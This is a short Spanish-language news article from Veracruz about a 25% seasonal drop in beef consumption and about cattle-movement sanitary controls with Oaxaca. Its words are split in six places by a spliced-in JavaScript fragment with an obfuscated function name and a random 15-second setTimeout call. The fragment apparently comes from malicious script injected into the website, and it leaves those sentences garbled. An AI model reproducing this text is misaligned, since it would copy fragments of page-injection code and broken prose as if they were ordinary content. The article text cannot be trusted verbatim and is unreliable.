Cae un 25% el consumo de carne de res; prefieren puerco, pollo y pavo

Adriana Muñoz. Veracruz. El presidente de la Unión Ganadera en la zona centro, Jesús Ortega Couttolenc, confirmó que ante la demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda de otros productos, en la temporada decembrina, el consumo de carne de res baja un 25 por ciento.

Y es que en estas fechas, los cárnicos preferidos por la ciudadanía son el puerco, pollo y pavo, mientras que la rea es poco consumida.

“25 por ciento más o menos, sí, sí pega, un carnicero que tenía en la tabla una vaca y la vendía toda, ahora venderá tres cuartas partes nada más”, enfatizó.

Asimismo, dijo que se está trabajandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando en el tema del control fitozoosanitario en lo que respecta al trasiego de ganado entre Oaxaca y Veracruz.

“Estamos tratandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando en que los alcances de los estados vecinos tengan el nivel que nosotros estamos buscandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando para ver si como estados colindantes podemos ingresar como región a una sola región”, puntualizó.

Desde hace unas administraciones se está trabajandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando en ello confirmó, pero no ha habido los recursos suficientes para crear los módulos de control entre las dos entidades.

“Cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando venga un gobernador con dinero para construir una barda entre Veracruz y Oaxaca es la única opción porque hay lugares que ustedes conocen que nos divide una calle y controlar la movilización de ganado”, aseguró.

En materia comercial, agregó, las exportaciones también disminuyen por las heladas, y se reactivan hasta febrero.

 

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Close